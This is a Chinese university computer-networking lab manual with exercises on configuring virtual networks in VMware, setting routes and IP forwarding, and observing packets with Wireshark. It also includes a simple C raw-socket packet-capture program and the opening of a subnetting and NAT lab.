/Image_001.png)
《计算机网络》
实验教材
[第 2.03 版]
0
庄元 许鼎鼎 编写
夏耐 顾庆 李文中 汇总
南京大学计算机科学与技术系 2017 年 2 月
目录
部 署 , 操 作 / 设 计 步 骤 ( 虚 拟 机 器 的 配 置 ) 6
实 验 二 RAW SOCKET 编 程 与 以 太 网 帧 分 析 基 础 16
实 验 五 动 态 路 由 协 议 RIP,OSPF 和 BGP 观 察 36
实 验 七 TCP 协 议 的 拥 塞 控 制 机 制 观 察 51
实验一 基本网络工具集使用和协议数据单元(PDU)观测
实验任务
-
利用VMWare 搭建一个由 5 台虚拟机组成的随机拓扑网络。要求该网络中至少有 3 个子网(暂时可假设internet 为一个子网),两个路由器,本章末尾给出实验参考拓扑。
-
利用 Wireshark 观测PDU:
-
安装并打开 Wireshark,确保本机能否正常上网。
-
在本机 ping 系主页 cs.nju.edu.cn,用 Wireshark 记录本机和cs.nju.edu.cn 相互通信的所有数据包,截图,简要分析数据包的各字段。
-
在本机打开浏览器,访问 www.nju.edu.cn,用 Wireshark 记录本机和 www.nju.edu.cn
相互通信的所有数据包,截图,简要分析数据包的各字段。
实验报告格式
按要求完成实验,并写出实验报告。实验报告格式如下,同学可以根据内容进行修改。说明是为了更详细的解释各个项目,提交的报告中无需包含。
|
实验目的 | |
|
网络拓扑配置 |
说明:填写附表 1,并绘图说明 |
|
路由规则配置 |
说明:写明输入的命令 |
|
数据包截图 |
说明:用 wireshark 抓包,并截图 |
|
协议报文分析 |
说明:对抓取的数据包进行字段分析 |
附表 1:
|
节点名 |
虚拟设备名 |
ip |
netmask |
|
Router0 |
eth0 (或其它形式的网卡编号): | ||
|
eth1 (同上): | |||
|
Router1 |
eth0 (同上): | ||
|
eth1 (同上): | |||
|
PC1 | |||
|
PC2 | |||
|
PC3 | |||
|
PC4 | |||
|
PC5 |
背景知识
本系列实验选用Linux 操作系统作为主要实验平台。通过虚拟机软件在一台计算机实体
上模拟出一个小型网络环境,完成实验。
- Linux
Linux 是由 Linus Torvalds 最初开发的操作系统内部核心程序,即内核(kernel)的标识。而所有的基于Linux kernel 的类UINX 操作系统也都被称作 Linux。相较于 Windows 操作系统在图形用户界面上的巨大优势,Linux 操作系统在网络应用上有很好的表现。这也是我们选用 Linux 操作系统作为主要实验平台的原因之一。
- Linux 下的常用网络命令有
ifconfig 、ping、ip、netstat 、netconfig、nc、tcpdump、telnet、ftp 、route、rlogin 、
rcp 等,我们简要介绍其中比较基础的 ifconfig 和 ping 命令。
ifconfig 和 MS-DOS 下的 ipconfig 命令相似,用以显示和设置网络设备。语 法:
ifconfig [网络设备][down up -allmulti -arp -promisc][add<地址>][del<地址>][<硬件地址>]
[media<网络媒介类型>][mem_start<内存地址>][metric<数目>][mtu<字节>][netmask<子网掩码>][tunnel<地址>][-broadcast<地址>] [-pointopoint<地址>]
参 数 :
<span class="s14">add<</span>地址<span class="s14">> </span>设置网络设备 <span class="s14">IPv6 </span>的 <span class="s14">IP </span>地址。
<span class="s14">del<</span>地址<span class="s14">> </span>删除网络设备 <span class="s14">IPv6 </span>的 <span class="s14">IP </span>地址。
<span class="s14">down </span>关闭指定的网络设备。
<span class="s14"><</span>硬件地址<span class="s14">> </span>设置网络设备的类型与硬件地址。
<span class="s14">io_addr </span>设置网络设备的 <span class="s14">I/O </span>地址。
<span class="s14">irq </span>设置网络设备的 <span class="s14">IRQ</span>。
<span class="s14">media<</span>网络媒介类型<span class="s14">> </span>设置网络设备的媒介类型。
<span class="s14">mem_start<</span>内存地址<span class="s14">> </span>设置网络设备在主内存所占用的起始地址。
<span class="s14">metric<</span>数目<span class="s14">> </span>指定在计算数据包的转送次数时,所要加上的数目。
<span class="s14">mtu<</span>字节<span class="s14">> </span>设置网络设备的 <span class="s14">MTU</span>。
<span class="s14">netmask<</span>子网掩码<span class="s14">> </span>设置网络设备的子网掩码。
<span class="s14">tunnel<</span>地址<span class="s14">> </span>建立 <span class="s14">IPv4 </span>与 <span class="s14">IPv6 </span>之间的隧道通信地址。
<span class="s14">up </span>启动指定的网络设备。
-broadcast<地址> 将要送往指定地址的数据包当成广播数据包来处理。
-pointopoint<地址> 与指定地址的网络设备建立直接连线,此模式具有保密功能。
-promisc 关闭或启动指定网络设备的 promiscuous 模式。指定网络设备的 IP 地址。
[网络设备] 指定网络设备的名称。
ping 命令是一个检查网络联通状况的常用命令,它发送一个回送信号请求给网络主机。语 法:
ping [ -d] [ -D ] [ -n ] [ -q ] [ -r] [ -v] [ \ -R ] [ -a addr_family ] [ -c Count ] [ -w timeout ] [ -f | -i \
Wait ] [ -l Preload ] [ -p Pattern ] [ -s PacketSize ] [ -S hostname/IP addr ] \ [ -L ] [ - I a.b.c.d. ] [ -o interface ] [ -T ttl ] Host [ PacketSize ] \ [ Count ]
参 数 :
-c Count 指定要被发送(或接收)的回送信号请求的数目,由 Count 变量指出。
-w timeout 这个选项仅和 -c 选项一起才能起作用。它使 ping 命令以最长的超时时间去等待应答(发送最后一个信息包后)。
-d 开始套接字级别的调试。
-D 这个选项引起 ICMP ECHO_REPLY 信息包向标准输出的十六进制转储。
-f 指定 flood-ping 选项。-f 标志“倾倒”或输出信息包,在它们回来时或每秒 100 次,选择较快一个。每一次发送 ECHO_REQUEST, 都打印一个句号, 而每接收到一个
ECHO_REPLY 信号,就打印一个退格。这就提供了一种对多少信息包被丢弃的信息的快速显示。仅仅 root 用户可以使用这个选项。
-I a.b.c.d 指定被 a.b.c.d 标明的接口将被用于向外的 IPv4 多点广播。-I 标志是大写的 i 。
-o interface 指出 interface 将被用于向外的 IPv6 多点广播。接口以 “en0”,“tr0”等的形式指定。
-i Wait 在每个信息包发送之间等待被 Wait 变量指定的时间(秒数)。缺省值是在每个信息包发送之间等待 1 秒。这个选项与 -f 标志不兼容。
-L 对多点广播 ping 命令禁用本地回送。
-l Preload 在进入正常行为模式(每秒 1 个)前尽快发送 Preload 变量指定数量的信息包。-l 标志是小写的 L。
-n 指定仅输出数字。不企图去查寻主机地址的符号名。
-p Pattern 指定用多达 16 个“填充”字节去填充你发送的信息包。这有利于诊断网络上依赖数据的问题。例如,-p ff 全部用 1 填充信息包。
-q 指定静默输出。除了在启动和结束时显示总结行外什么也不显示。
-r 忽略路由表直接送到连接的网络上的主机上。如果 主机 不在一个直接连接的网络上,ping 命令将产生一个错误消息。这个选项可以被用来通过一个不再有路由经过的接口去 ping 一个本地主机。
-R 指 定 记 录 路 由 选 项 。 -R 标 志 包 括 ECHO_REQUEST 信 息 包 中 的
RECORD_ROUTE 选项,并且显示返回信息包上的路由缓冲。
-a addr_family 映射 ICMP 信息包的目的地址到 IPv6 格式,如果 addr_family 等于
“inet6”的话。
-s PacketSize 指定要发送数据的字节数。缺省值是 56,当和 8 字节的 ICMP 头数据合并时被转换成 64 字节的 ICMP 数据。
-S hostname/IP addr 将 IP 地址用作发出的 ping 信息包中的源地址。在具有不止一个
IP 地址的主机上,可以使用 -S 标志来强制源地址为除了软件包在其上发送的接口的 IP地址外的任何地址。如果 IP 地址不是以下机器接口地址之一,则返回错误并且不进行任何发送。
-T ttl 指定多点广播信息包的生存时间为 ttl 秒。
-v 请求详细输出,其中列出了除回送信号响应外接收到的 ICMP 信息。更多命令信息请各位自行使用 man 命令查询,例:man ip。
- 虚拟机
我们采用虚拟机(Virtual Machine)软件来模拟一个网络环境进行实验,这类软件的主要功能是利用软件来模拟出具有完整硬件系统功能的且运行在隔离环境中的完整计算机系统。这样我们可以在一台物理计算机即宿主机器(Host Machine)上模拟出一台或多台虚拟的计算机。这些虚拟机能够像真正的计算机那样进行工作,我们可以在其上安装全新的操作系统和应用软件。通过虚拟机软件中的虚连接设备将各个虚拟机连接起来,我们就可以搭建出实验所需的网络环境。
实验方法
本实验的主要目的是让学生了解在一个常见的 UNIX/Linux 系统中,熟悉系统最基本的网络工具集合(包括ifconfig、route、wireshark 等)的使用,并能够熟练观察和初步分析协议PDU 的内容,为进一步的实验打下基础。
部署,操作/设计步骤(虚拟机器的配置)
- 虚拟机及网络配置
虚拟机软件以VMWare 为例,操作系统选用Ubuntu 18.04。
1. 首先按照提示安装<span class="s14">/</span>拷贝多个虚拟机
除需运行图形界面软件的虚拟机外,其它默认采用字符界面。在字符界面下可以选用普通用户或根用户<span class="s14">(root)</span>登录。用普通用户登录时,命令提示符为<span class="s14">$</span>,在执行需要 <span class="s14">root </span>用户权限的命令时可通过在命令前加 <span class="s14">sudo</span>,或用 <span class="s14">su </span>命令提升为 <span class="s14">root </span>用户完成。用 <span class="s14">root </span>用户登录时,命令提示符变为<span class="s14">#</span>。
从字符界面启动图形界面时用命令 <span class="s14">startx</span>,为使图形界面运行正常,请先确保虚拟机内存至少达到 <span class="s14">256M</span>。
2. 连接已安装好的多个虚拟机
VMWare <span class="s13">提供了十个虚拟交换机 </span>VMnet0—VMnet9<span class="s13">。其中</span>VMnet0<span class="s13">、</span>VMnet1 <span class="s13">和 </span>VMnet8<span class="s13">为专用设备,分别以 </span>default Bridged<span class="s13">、</span>Host-only <span class="s13">和 </span>NAT <span class="s13">三种方式为虚拟机提供宿主机器原网络服务。另外七个虚拟交换机未被定义,可以用它们进行连接,配制虚拟网络。</span>
如图为虚拟机启动前状态:
<span>/Image_002.jpg)</span>
选择 <span class="s27">Commands </span>条目下 <span class="s27">Edit virtual machine settings </span>选项,即红框中部分。可对虚拟机的虚拟硬件设备进行调配。
设置界面如下:
<span>/Image_003.jpg)</span>
选择 <span class="s27">Network Adapter</span><span class="s14">,</span>在右侧的选项框中,用 <span class="s27">Custom:Specific virtual network </span>条目设置虚拟机与虚拟交换机的连接。如图虚拟机<span class="s14">U-571 </span>与虚拟交换机<span class="s15">VMnet2 </span>连接。
<span class="s14">VMWare </span>没有提供虚拟路由,我们需要用虚拟机来模拟出一个路由器,这样用来模拟路由器的虚拟机至少需要两张网卡,同样通过 <span class="s27">Virtual Machine Settings</span>,可以为虚拟机添加多张网卡。选择上图左边框下方的 <span class="s27">Add </span>按钮
<span>/Image_004.jpg)</span>
点选 <span class="s27">Network Adapter</span>
<span>/Image_005.jpg)</span>
同样选择 <span class="s27">Custom:Specific virtual network</span>,这张虚拟网卡与虚拟交换机 <span class="s15">VMnet3 </span>连接。连接一个简单的网络如下图所示时
<span>/Image_006.jpg)</span>
虚拟机的配置图如下:
<span>/Image_007.png)</span> <span>/Image_008.jpg)</span>
- 设置 IP 与路由规则
IP 地址是计算机进行网络通讯的基础,每一台联网计算机都至少具有一个 IP 地址。在日常使用中,我们通常能自动获取 IP,这是由于 DHCP 协议的作用。在本次实验中我们需
要手动为配置好的虚拟网络分配 IP 地址。
首先使用 ifconfig 命令查看网络配置,以虚拟机 U-571 为例,键入命令
ifconfig -a | less
用"q"键退出。
/Image_009.jpg)
此时,虚拟机还没有 ipv4 地址。
然后再使用 ifconfig 命令分别为两个网络设备 eth0(以真机为准)、eth1 设置 IP(设置
IP 地址时,子网号最好和虚拟交换机VMnet*保持一致,便于调试),命令形式如下:
sudo ifconfig eth0 192.168.2.1 netmask 255.255.255.0
配置好后再用 ifconfig -a 查看
/Image_010.jpg)
对于端系统和大多数情况下的路由器还需要设置网关(路由器中也称为转发规则)(由于例子中的拓扑只有一个路由器,因此跨路由器的数据报均由该路由器转发,因此路由器 U-571 不需要设置转发规则)
以虚拟机 U-572 为例,设置 U-571 的 eth0 为其默认网关(一般情况下,一台主机只有一个默认网关,当终端只有一个网络适配器时,可以用设置默认网关这种操作方式),使用
route 命令,命令形式如下:
sudo route add default gw 192.168.2.1
用命令 route 查看结果
/Image_011.jpg)
IP 设置好后,就可以根据 IP 在路由器上设置路由规则。(刚才已经说过,因为拓扑中只有一个路由器,其实添加路由规则是不必要的,但是为了给大家展示命令的使用,下面给出了添加路由规则的命令)。
如为使虚拟机 U-572 和 U-573 之间能够进行通讯,在 U-571 上添加路由规则,命令形如:
sudo ip route add 192.168.2.0/24 via 192.168.2.1 sudo ip route add 192.168.3.0/24 via 192.168.3.1
其中 ip route add 192.168.2.0/24 via 192.168.2.1 命令添加的规则,告诉路由目的 IP 在
192.168.2.0/24(192.168.2.1~192.168.2.255)网段内的数据报经由 IP 地址为 192.168.2.1 的设备
转发出去,即下一跳的 IP 为 192.168.2.1。而 192.168.2.0/24 是Linux 中常用的掩码表示方式。
24 表示掩码字长为 24 即掩码为 255.255.255.0,192.168.2 为网络号,1~254 为网络中的主机号。此外还有其他形式用于添加路由规则的命令。
当输入上述命令后,Linux 会提示 file exists 的错误信息,说明 Linux 在分配 IP 地址的时候,会默认帮我们生成一部分路由信息,默认生成的一般是正确的,因此可直接执行下一步操作。但是有两个以上的路由器该怎么设置 IP 信息呢?当有超过两个路由器时,添加路由规则的正确与否在于 via 后面的“下一跳”IP 地址,请大家自行理解“下一跳”的含义,探索如何正确设置路由器的路由规则。
最后我们要让虚拟路由允许转发,置虚拟机 U-571 的 ip_forward 标志为 1。这里我们需要把/proc/sys/net/ipv4/目录下的文件 ip_forward 值置为 1。使用命令 echo,形如:
echo 1 > /proc/sys/net/ipv4/ip_forward
注意,在执行命令前,请先输入:
sudo su
进入 root 用户,再对 ip_forward 的值进行修改。否则会报“permission deny”的错误。更改完成后,请输入 exit 返回到普通用户,因为 root 用户权限太高,对 Linux 所有文件拥有修改权限,如果不小心改动了不该更改的文件,会对 Linux 造成不可逆的损害。
最后,如果 U571、U572 和 U573 能够相互ping 通,证明上述实验成功完成。
- 抓取协议数据单元
在网络配置完成的基础上,使用网络抓包分析工具 wireshark 抓取协议数据单元进行分析。例如在虚拟机 U-572 上使用 ping 命令测试与虚拟机 U-573(设其 ip 为 192.168.3.2)是否连通。使用命令
ping 192.168.3.2
在图形界面下使用 wireshark 可以抓取数据包,运行 wireshark 时需要 sudo 权限,否则无法进行数据报的抓取。
sudo wireshark
在下图中 Interface list 中选择要监听的设备,单击即开始监听,运行情况如下:
/Image_012.jpg)
/Image_013.jpg)
wireshark 能够深入地解析每个分组。图示中第一个区域是列表框,记录了数据报的基本信息(序号、时间戳、源地址、目的地址、协议、数据报长度、大致信息),第二个区域为协议框,wireshark 已经帮我们分析好了各个协议并予以显示,在此区域可以看到数据报的字段信息和每个字段的含义,第三个区域为原始框,上面给出了数据报的 16 进制数据信息和 ASCII 表示的信息。在列表框中选中一个分组,协议框和原始框中会显示该分组的详细信息。如图:
/Image_014.jpg)
协议框中显示所选分组的各层协议:物理层帧、以太网帧、IP 协议,Internet 控制报文协议。原始框中则显示分组中包含的数据的每个字节。从中可以观察到原始数据,其中左边显示的是十六进制的数据,右边则是 ASCII 码。在协议框中选中一个条目,在原始框中会标记出对应的原始数据,反之在原始框中选中也一样。因此,我们可以利用 wireshark 轻松的分析协议的各个字段的含义及属性。
下图为实验任务的参考拓扑:
/Image_015.jpg)
常见问题
**问题 **1:主机无法Ping 通与其直接相连的虚拟路由器?
解答:a. 检查主机和虚拟路由器的网卡 Network Adapter 是否为同一类型的虚拟交换机
VMnet*(在虚拟机的设置中,网卡顺序和 ifconfig -a 看到的网卡顺序是相同的);
-
检查主机网关是否为虚拟路由器对应的网卡 IP 地址;
-
确认 IP 设置无误,注意请先置 IP 再置网关(在设置 IP 地址时,请确保设置 IP 的网络适配器的正确性)。
**问题 **2:主机可以 ping 通网关,但是无法ping 通主机所在局域网外的路由器或主机?解答:a. 检查虚拟路由器是否允许转发,确保 ip_forward 为 1,即允许转发;
-
检查虚拟路由器转发规则是否正确,确保转发端口(下一跳)和当前主机不在同一个局域网内。
-
当有一段很长的链路需要进行联通(ping)测试时,可以采取分段分析的策略,通过分段分析可以准确定位
**问题 **3:为什么打开 572-573 或者 575-578 的时候,需要定位 571 或者 574 的虚拟机文件?解答:在创建虚拟机的时候,为了节省计算机资源,572-573、575-578 均为链接复制,因此在打开时需要定位主文件的位置。(有兴趣的同学可以自己创建多个虚拟机)
**问题 **4:为什么我设置了 IP 地址,过一会儿之后 IP 地址自动消失了?
解答:实验室的图形界面虚拟机默认开启了DHCP 模式,会自动发现并分配 IP 地址,但是局域网内并没有DHCP 服务器,因此该服务启动时,会抵消掉原来设置好的 IP 地址。因此在使用图形界面时,可以先用下述命令:
sudo service network-manager stop
关闭网络服务,再手动设置 IP 地址。
顺便一提,如果你觉得每次开机都要设置 IP 地址很麻烦,可以在/etc/network/interfaces文件中写入你想设置的 IP 地址。(/etc/network/interfaces 的格式请自行查阅资料)
**问题 **5:在添加路由规则的时候出现了“no such process” ,该如何处理?
解答:1. 当出现该错误时,请输入 ifconfig -a 检测自己设置的 IP 地址是否还存在,如果不存在,请参照问题 4。
针对下面两种情况,假设添加路由规则的命令为:ip route add 192.168.a.0/24 via 192.168.c,d
-
原理上来说,路由规则如果能正确生效,192.168.c.d 必须是该路由器能够“通信”的 IP地址。在我们实验中,可以理解为 192.168.c.d 和路由器的出端口 IP 地址在同一个子网下,例如,路由器的出端口是 eth1,IP 地址为 192.168.3.1,那 via 后面的 IP 地址 192.168.c.d,必须是 192.168.3.x 和 eth1 的 IP 地址在同一子网内。如果不在同一子网内,路由器无法正确添加路由规则,因此会报“no such process”的错误。此情况输入正确的路由规则即可。
-
假设还是上述路由器,如果添加路由规则时,在 via 后面先添加了自己出端口的 IP 地址, ip route add 192.168.a.0/24 via 192.168.3.1,那么把这条路由规则删除,再添加相关的路由规则时,比如 ip route add 192.168.a.0/24 via 192.168.3.2,也会报“no such process”的错误。如果是这种情况,先利用命令 ifconfig eth1 down 使该网口失效,然后重新设置 IP 地址和路由规则即可。
问题 6:为什么 sudo echo 1 > /proc/sys/net/ipv4/ip_forward 会报错?
解答:sudo 的作用是将命令以 root 权限执行,仅作用于后面跟的那一条命令。
> file 表示将标准输出重定向到file 文件内,这一步是由shell 来执行的,因此受制于当前shell
的权限。
shell 将 sudo echo 1 的输出写入到/proc/sys/net/ipv4/ip_forward 时,由于没有对应的写入权限
(需要 root),因此会报错。
实验二 RAW SOCKET 编程与以太网帧分析基础
实验任务
-
编写自己的抓包程序。在本机分别运行 ping 程序和用浏览器浏览网页,使用该抓包程序记录相应的数据包,截图并做简要分析。
-
编写自己的 ping 程序。利用 Raw Socket 封装和发送以太网帧的功能,实现 ICMP 包的发送和接收,并输出结果。分别运行你的 ping 和系统的 ping 程序,截图并作简单比较。
提交材料:实验报告及程序源代码。
实验报告
由于本次实验着重程序的设计,试验报告中将不要求统一的配置性细节,大家可以自行设置实验环境。
实验者需提交源代码以及实验报告。提交文件布局如下:
/Image_016.jpg)
其中 source.c 为 C 的源文件,configuration.file 为相关配置文件。建议同学可以在source.c 中的重要代码或者函数入口处添加注释,不做定性要求。
实验报告请提交pdf 文档,其中应包含如下表所示的内容,同学可以根据内容进行修改。说明是为了更详细的解释各个项目,提交的实验报告中无需包含。
|
实验目的 | |
|
数据结构说明 |
说明:此处需要解释各自的源代码中的数据结构,以及其用途。示例: struct xiaomaolv{ int id; floag weight; int age; }; 该结构是一个描述 xiaomaolv 的结构,对应于现实生活农场中养的毛驴,其中 id 是其在农场中的编号,weight,age 分别代表了该毛驴的质量和年龄。 |
|
配置文件说明(非必须) |
说明:此处需要给出配置文件的格式以及读取方式,如程序中没有用到配置文件,则该项可省略 |
|
程序设计的思路以及运行流程 |
说明:此处需要给出程序的运行流程或者思路。请给出如下两种格式之一:
|
|
运行结果截图 |
说明:请给出你的运行结果截图 |
|
相关参考资料 |
说明:请给出你完成该实验的参考书目或者网页 |
|
对比样例程序 |
说明:请给出你参考样例程序的部分,假如没有参考点,填无 |
|
代码个人创新以及 思考 |
说明:请给出你认为你的源代码中的亮点,比如,针对某个细 节的处理或者算法的优化 |
|
该程序的应用场景 创新(非必须) |
说明:请思考一下,该类程序除了在背景中的应用之外,是否 还有其他可能的应用场景。 |
背景知识
- 基础背景
在计算机网络中,socket 是一个很重要的概念。因为,在网络通讯之中,我们可以把其理解为两个进程的通信,通信的话就要描述通信链路两端的信息。而套接字就是使用操作系统中的文件描述符和系统进程进行通信的一种手段。Socket 有时也被看作是一个网络编程接口集,应用程序,或者TCP/IP 协议栈。 目前,有许多类型的 socket 可用,其中包括数据流套接字,数据报套接字,原始套接字等。其中在一般的应用程序之中,前二者用的比较多,但是,在一些安全程序,网络管理程序之中,对于数据链路层整体包的捕获要求,它们并不能很好的满足。那么,这里就要用 raw socket,也就是原始套接字。 原始套接字可以使得应用程序直接收发在网络上传输的包,那么我们就可以直接对原始数据包的内容进行修改和检测,这对特定环境下的应用非常必要。比如,在共享式以太网环境下,网络是共享的,所有的包传输都是通过同过如下方式进行传播的:发送主机要向另外一个主机发包,那么当这个包离开发送主机在网络上传输的时候,其他所有的主机都可以收到这个包,但是,在操作系统的内核协议栈上,对目标地址与自己无关的包都被丢弃了。那么对于网络管理员来说,可以对整个网络的数据进行监控和控制。 嗅探,就是网络管理员进行网络监控的一种途径。所谓嗅探,就是充分利用了以太网的特点,通过将网卡设置成混杂模式,将网络上传输的包进行捕获,并显示出来。通过这种方法,可以检测出网络的流量状况,ARP 欺骗等一系列问题。
- Raw socket 编程基础
Raw socket 的编程源自于socket 编程,只是参数和实际收发包的整体内容有所区
别。同 socket 一样,要收发包首先应该先建立一个 socket。socket 的函数原型如下:
int socket(int domain,int type,int protocol);
其中 domain 标识一个通信域,一般来说,通信域决定了真正用于通信的协议族。 就目前来说,支持的域包括 UNIX,INET,INET6,IPX 等连接服务。其中支持 TCP/IP协议的套接口类型是 INET 。在 Linux 的 INET 套接口支持 SOCK_STREAM, SOCK_DGRAM, SOCK_RAW 等套接口类型。下面是一个创建普通套接字类型的例子。 int sockfd;
sockfd = socket(AF_INET, SOCK_RAW, protocol);
这是一个很普通的创建raw socket 的操作,但是他所真正控制的仅仅是一个 IP 包,假如我们要对数据链路层的数据进行操作,我们需要按照如下方式进行创建 sockfd = socket(PF_PACKET,SOCK_RAW,htons(ETH_P_IP);
创建完 socket,可以自定义 socket 的行为,对应的函数原型是 setsockopt(int sockfd,int level,int optname,const void * optval,socklen_t optlen);
其中参数的含义分别是:sockfd 指明要设置的套接字描述符,level 指明定义的层次,一般可用的选项有 SOL_SOCKET, IPPROTO_IP, IPPROTO_IPV6, IPPROTO_TCP。例如在
socket API 的层次来定义选项,可以将 level 设置成 SOL_SOCKET。optname 指明要设置的选项 ID,而 optval 则是存放选项值的地址,optlen 指明选项值的长度。假设我们要在发送 UDP 包的时候使其进行广播,有
int bBroadcast=1;
setsockopt(s,SOL_SOCKET,SO_BROADCAST,(const char*)&bBroadcast,sizeof(int));
创建完一个 socket 之后,这个 socketfd 对应的socket 就可以收包了 recvfrom(int sockfd,void* buf,size_t len,int flags,struct sockaddr * src_addr,socklen_t * addrlen); 其中 buf 是收到的包所存放的位置,这里假如我们创建socket 的给出的参数是接收数据链路层上的包,那么我们可以获得的数据包就是以太帧。 在 Linux 中,调用 man 可以查看相关命令的调用细节,如 man socket.此处应当注意, man 手册共有 8 个sections,每个对应于不同的区域。一般而言,对于程序设计者来说,会用 man 2,这里用的环境是 ubuntu 18.04,man 的默认 section 为 7。
/Image_017.jpg)
图 1
- 以太帧解析
所谓以太帧,就是在以太网上传输数据的时候用的一个单位。在以太网上跑的基本是 MAC 包头的包,此时就有如下的 MAC 包,
/Image_018.jpg)
图 2
根据 MAC 头部的类型信息, 对应的数据部分有多种可能。叫常用的有
0800,0806,8035。分别对应于 IP 数据包,ARP 请求/应答,RARP 请求应答。 其中 IP 数据包的格式如下:
/Image_019.jpg)
图 3
下面是一个用 Wireshark 抓取的 ARP 请求包
/Image_020.jpg)
图 4
在这个图中,我们可以看到一个以太帧的完整格式,包括整个以太帧的 16 进制表示。 一些相关的资料链接
实验目标
本实验主要目的是让学生熟悉 Linux 环境下基本的raw socket 编程,对以太网帧进行初步分析,可通过程序完成对不同层次 PDU 的字段分析,修改和重新发送。
部署,操作/设计步骤 (虚拟机器的配置和拓扑)
我们要做的事情就是运行一个我们用 raw socket 实现的程序,该程序用来捕获主机之间互相发送的包,并可以修改相关字段并重新发送。
首先,我们应当明白,用 raw socket 捕获的数据包内容是存放在一个缓冲区内,一般情况下,是一个指针指向的内存区域。内存区域的不同字段所代表的含义是网络协议事先规定好的。修改相关字段也仅仅是修改对应内存上的数据而已。下面,给出实验的步骤。
- 虚拟机配置
我们需要的网络拓扑如下:
/Image_021.jpg)
图 5 在 VMWare 设置如下,设置两台主机和一台路由,配置其为 PC1, PC2,Router。在这里,我们用一台 Linux 主机来模拟 Router。
分别打开shell,输入如下命令(网卡编号以真机为准): PC 1$ **sudo ifconfig eth0 192.168.2.2 netmask 255.255.255.0 **PC 1$ sudo route add default gw 192.168.2.1
PC 2$ sudo ifconfig eth0 192.168.3.2 netmask 255.255.255.0
PC 2$ sudo route add default gw 192.168.3.1
配置 Router 并开启 Router 的路由转发功能
Router$ **sudo ifconfig eth0 192.168.2.1 netmask 255.255.255.0 **Router$ **sudo ifconfig eth1 192.168.3.1 netmask 255.255.255.0 **Router$ sudo su
Router# echo 1 > /proc/sys/net/ipv4/ip_forward
测试
PC 1$ ping 192.168.3.2
如果能 Ping 通说明连接已经建立,下面对抓包程序进行说明。
- 代码实现与检测 下面给出一个简单的抓包代码 #include <stdio.h> #include <unistd.h> #include <sys/socket.h>
#include <sys/types.h> #include <linux/if_ether.h> #include <netinet/in.h> #define BUFFER_MAX 2048
int main(int argc,char* argv[]){ int sock_fd;
int proto; int n_read;
char buffer[BUFFER_MAX]; char *eth_head;
char *ip_head; char *tcp_head; char *udp_head; char *icmp_head; unsigned char *p;
if((sock_fd=socket(PF_PACKET,SOCK_RAW,htons(ETH_P_ALL)))<0)
{ printf("error create raw socket\n"); return -1;
}
while(1){
n_read = recvfrom(sock_fd,buffer,2048,0,NULL,NULL); if(n_read < 42)
{
printf("error when recv msg \n"); return -1;
}
eth_head = buffer; p = eth_head;
printf("MAC address: %.2x:%02x:%02x:%02x:%02x:%02x
==> %.2x:%02x:%02x:%02x:%02x:%02x\n", p[6],p[7],p[8],p[9],p[10],p[11],
p[0],p[1],p[2],p[3],p[4],p[5]);
ip_head = eth_head+14; p = ip_head+12;
printf("IP:%d.%d.%d.%d==> %d.%d.%d.%d\n", p[0],p[1],p[2],p[3],p[4],p[5],p[6],p[7]);
proto = (ip_head + 9)[0]; p = ip_head +12; printf("Protocol:"); switch(proto){
case IPPROTO_ICMP:printf("icmp\n");break; case IPPROTO_IGMP:printf("igmp\n");break; case IPPROTO_IPIP:printf("ipip\n");break; case IPPROTO_TCP:printf("tcp\n");break; case IPPROTO_UDP:printf("udp\n");break; default:printf("Pls query yourself\n");
}
}
return -1;
}
程序的思路很简单,就是建立一个简单的链路层 socket,然后不断的收包,显示包的部分内容,并根据包头类型域的值来显示包的类型。
在任何一台机器上编译该程序 PC 1$ gcc raw_socket.c –o raw_socket
编译成功之后运行(运行时需要 root 权限) PC 1$ sudo ./raw_socket
会收到相应的包并有结果输出 在笔者的机器上,输出如下:
/Image_022.png)
PC 1 Ping PC 2 的情况 (框中内容为完整起见列出,实际不显示) MAC address: PC 1’s mac address ===> Router’s mac address IP:192.168.0.2 ==> 192.168.1.2
Protocol:icmp
MAC address: Router’s mac address ===> PC 1’s mac address IP: 192.168.1.2 ==> 192.168.0.2
Protocol:icmp
实验者需修改程序,使其对更多的网络协议进行支持,比如 ARP 协议。并最好可以在终端下模仿Wireshark,TCPDump,OmniPeek 等主流抓包工具的输出方式。同时应该尝试对数据段进行更改,比如可以自己调用 Raw Socket API 来发送一个 ICMP 请求包,而不是通过调用 Ping 命令来发送,等待和分析目的主机的回应。关于修改数据段的操
作,可以尝试使用 memset 函数。
补充内容
创建socket时,若将protocol参数设置为ETH_P_IP,则不能抓取本机发送出去的数据包,具体原因见:https://lkml.org/lkml/1999/12/23/112
sock_raw 编程可以接收到本机网卡上的数据帧或包,对于监听网络流量和分析是很有作用的。一共可以有 3 种方式创建:
* socket(AF_INET, SOCK_RAW, IPPROTO_TCP | IPPROTO_UDP | IPPROTO_ICMP)<span class="s13">,发送和接收 </span>IP <span class="s13">数据包;</span>
* socket(PF_PACKET, SOCK_RAW, htons(ETH_P_IP |ETH_P_ARP |ETH_P_ALL))<span class="s13">,发送和接收以太网数据帧</span>
* socket(AF_INET, SOCK_PACKET, htons(ETH_P_IP|ETH_P_ARP|ETH_P_ALL))<span class="s13">,老的用法,不推荐。</span>
实验三 子网划分和 NAT 配置
实验任务
/Image_023.jpg)
- 按照如图所示的网络拓扑,配置网络,形成三个子网,子网 1(PC0,PC1),2(PC3),
3(PC2),在 router0 上设置路由规则,使得子网 1 和子网 2 变成内网,子网 3 和 router0
的一个端口处于公网。
设置完成之后,让PC0,PC2,PC3 两两互ping,并把截图记录下来。
- 设置 iptables 规则,内网设备可以通过 NAT 跟公网设备通信。
设置完成之后,让PC0,PC2,PC3 两两互ping,并把截图记录下来。
- 比较 1 和 2 的结果,并解释 NAT 所起到的作用。
实验报告
按要求完成实验,并写出实验报告。实验报告格式如下,同学可以根据内容进行修改。说明是为了更详细的解释各个项目,提交的报告中无需包含。
|
实验目的 | |
|
网络拓扑配置 |
说明:填写附表 1,并绘图说明 |
|
路由规则配置 |
说明:写明输入的命令 |
|
NAT 设置命令 |
说明:写出所使用的命令 |
|
数据包截图 |
说明:用 wireshark 抓包截图 |
|
协议报文分析 |
说明:对抓取的数据包进行字段分析 |
附表 1:
|
节点名 |
虚拟设备名 |
ip |
netmask |
|
Router0 |
eth0: | ||
|
eth1: | |||
|
eth2: | |||
|
Router1 |
eth0: | ||
|
eth1: | |||
|
PC0 | |||
|
PC1 | |||
|
PC2 | |||
|
PC3 |
背景知识
- 子网划分
